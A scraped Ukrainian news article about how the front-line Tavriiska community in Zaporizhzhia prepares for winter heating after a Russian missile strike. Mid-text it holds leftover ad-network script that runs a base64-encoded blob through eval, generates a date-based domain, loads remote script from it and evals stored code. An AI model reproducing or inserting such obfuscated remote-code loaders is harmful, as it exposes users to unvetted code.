Як готується до зими прифронтова громада на Запоріжжі, яку наприкінці вересня обстріляла РФ (КАРТА, ВІДЕО)

Прифронтова Таврійська громада на Запоріжжі, яку наприкінці вересня обстріляли російські окупанти, наразі готується до опалювального сезону. Журналісти поспілкувалися з головою громади та дізналися, як у прифронтовій ОТГ проводиться підготовка до найскладнішої в історії України зими.

Про це інформує Акцент з посиланням на випуск Суспільне Запоріжжя.

Ситуація у Таврійській ОТГ

Таврійська об’єднана територіальна громада, адміністративним центром якої є село Таврійське, знаходиться у Запорізькому районі Запорізької області. Прифронтове село розташоване майже в 15 кілометрах від міста Оріхова Пологівського району, яке регулярно обстрілює РФ.

Великий фоторепортаж з Оріхова: окупанти вчиняють тут геноцид з перших днів вторгнення (+ВІДЕО) Таврійська ОТГ. Карта: Вікіпедія Відстань від села Таврійського до Оріхова — майже 15 км. Карта: Deep State

Наприкінці вересня війська РФ обстріляли чотирма ракетами село Таврійське: за інформацією голови Таврійської громади Михайла Свириденко, один ворожий снаряд влучив по приватному підприємству, інші три — поруч зі спортивним залом, будинком культури та гімназією «Перспектива».

Наслідки ракетного удару РФ по селу Таврійське. Скріншот випуску Як Таврійська громада готується до зими

За словами голови ОТГ Михайла Свириденко, у Таврійській громаді, яка готується до опалювального сезону, загалом налічується 1443 подвір’я, з яких 40% газифіковано, а решта — на пічному опаленні або твердопаливних котлах. Також, 26 будинків опалюються за допомогою електроприладів. Наразі у Таврійській громаді залишається 80% населення від тієї кількості, що була тут до повномасштабного вторгнення РФ.

Ворожий снаряд впав у 15 метрах від котельні ОТГ — зруйновані вікно та склад з полетами. Скріншот з випуску Суспільне Запоріжжя

«Розраховуємо на те, що в опалювальний сезон ми будемо з газом. (…) Люди розуміють, що їм треба пройти опалювальний сезон, тому запасаються і дровами, і вугіллям, і брекетами. (…) Сьогодні у нас проведена робота — ми збирали підприємців, які торгують пілетами, брикетами: вони пообіцяли, що на даний момент у них все є, вони в змозі забезпечити», — розповідає голова Таврійської громади Михайло Свириденко. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Як зазначається, у громаді планують окремо закупити опалювальні матеріали для незахищених верств населення, а також облаштувати пункт обігірву на випадок надзвичайних ситуацій.

Детальніше — у випуску нижче.

До слова, як раніше інформував Акцент, Новоандріївка — прифронтове село в Пологівському районі Запорізької області, яке фактично знаходиться на лінії вогню: через регулярні обстріли російських окупантів у населеному пункті немає світла, води та зв’язку. Журналісти поспілкувалися з місцевими жителями та дізналися, як вони готуються до найважчої зими в історії України.

На лінії вогню: як готується до зими село на Запоріжжі, яке регулярно обстрілює РФ (КАРТА, ВІДЕО)

Заголовне фото — скріншот з випуску Суспільне Запоріжжя. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/yak-gotuyetsya-do-zimi-prifrontova-gromada-na-zaporizhzhi-yaku-naprikintsi-veresnya-obstrilyala-rf-karta-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top